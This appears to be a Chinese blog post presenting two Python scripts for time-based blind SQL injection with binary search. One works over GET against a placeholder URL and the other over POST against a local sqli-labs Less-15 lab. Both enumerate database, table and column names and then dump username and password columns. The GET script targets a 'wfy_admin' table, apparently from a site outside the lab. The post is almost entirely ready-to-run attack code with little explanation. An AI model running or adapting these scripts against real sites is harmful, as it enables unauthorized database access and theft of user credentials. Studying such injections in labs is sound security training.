SQL时间盲注——二分法
一、噢噢噢……时间盲注比盲注还废手,所以我还是用脚本吧。本来是上次就应该写好的,但是奈何自己犯傻了,用初始时间去减结束时间,然后的结果相信大家都知道了……
SQL时间盲注——GET注入
二、还是老样子,使用的是大佬的脚本进行改版的,反正自从看了大佬的脚本,也差不多会写了……直接上代码吧,反正相信大家都能看懂
import time
import requests
url = "http://xxx.com/?id=1"
def getDatabase(): # 获取数据库名
# 将url变量变为一个全局变量
global url
ans = ""
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = url + "' and if(ascii(substr((select database()),{0},1))<{1},sleep(3),1) -- p".format(i, mid)
# print(payload) # 用于测试
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("database is -> " + ans)
def getTable(): # 获取表名
global url
ans = ""
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = url + "' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))<{1},sleep(3),1) -- p".format(
i, mid)
# print(payload)用于测试
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("table is -> " + ans)
# 返回表名,此时表名为一个列表
return ans
def getColumn(TBname): # 获取列名
global url
ans = ''
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = url + "' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{0}'),{1},1))<{2},sleep(3),1) -- p".format(
TBname, i, mid)
print(payload) # 用于测试
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("column is -> " + ans)
# 返回一个列名
return ans
def dumpTable(): # 脱裤
global url
ans = ''
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = url + "' and if(ascii(substr((select group_concat(username,password) from wfy_admin),{0},1))<{1},sleep(3),1) -- p".format(
i, mid)
print(payload) # 用于测试
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("dumpTable is -> " + ans)
if __name__ == "__main__":
# # getDatabase()
# TBname = getTable()
# # print(type(TBname))表示是一个字符串,用来测试
# TBnames = []
# TBnames.append(TBname.split(','))
# # 因为输出的是一个二元数组,所以使用下面的代码来转为一维数组
# TBnames = TBnames[0]
# print(TBnames)
# TBlen = len(TBnames)
# for i in range(0, TBlen):
# TBname = TBnames[i]
# # print(TBname)
# getColumn(TBname)
# if i == TBlen - 1:
# break
dumpTable()
运行结果就不放了。
SQL时间盲注——POST注入
import requests
import time
url = "http://192.168.59.150/sqli-labs/Less-15/"
def getDatabase(): # 获取数据库名
# 将url变量变为一个全局变量
global url
ans = ''
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "admin' and if(ascii(substr((select database()),{0},1))<{1},sleep(3),1) -- p".format(i, mid)
# print(payload)用于测试
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("database is -> " + ans)
def getTable(): # 获取表名
global url
ans = ""
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = 'admin\' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))<{1},sleep(3),1) -- p'.format(
i, mid)
# print(payload)用于测试
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("table is -> " + ans)
# 返回表名,此时表名为一个列表
return ans
def getColumn(TBname): # 获取列名
global url
ans = ''
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{0}'),{1},1))<{2},sleep(3),1) -- p".format(
TBname, i, mid)
# print(payload)用于测试
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("column is -> " + ans)
# 返回一个列名
return ans
def dumpTable(): # 脱裤
global url
ans = ''
for i in range(1, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "admin' and if(ascii(substr((select group_concat(username,password) from users),{0},1))<{1},sleep(3),1) -- p".format(
i, mid)
# print(payload)# 用于测试
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# 如果时间大于3,那么说明为真
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("dumpTable is -> " + ans)
if __name__ == "__main__":
# # getDatabase()
# TBname = getTable()
# # print(type(TBname))表示是一个字符串,用来测试
# TBnames = []
# TBnames.append(TBname.split(','))
# # 因为输出的是一个二元数组,所以使用下面的代码来转为一维数组
# TBnames = TBnames[0]
# # print(TBnames)
# TBlen = len(TBnames)
# for i in range(0,TBlen):
# TBname = TBnames[i]
# # print(TBname)
# getColumn(TBname)
# if i == TBlen - 1:
# break
dumpTable()
运行结果也不放了。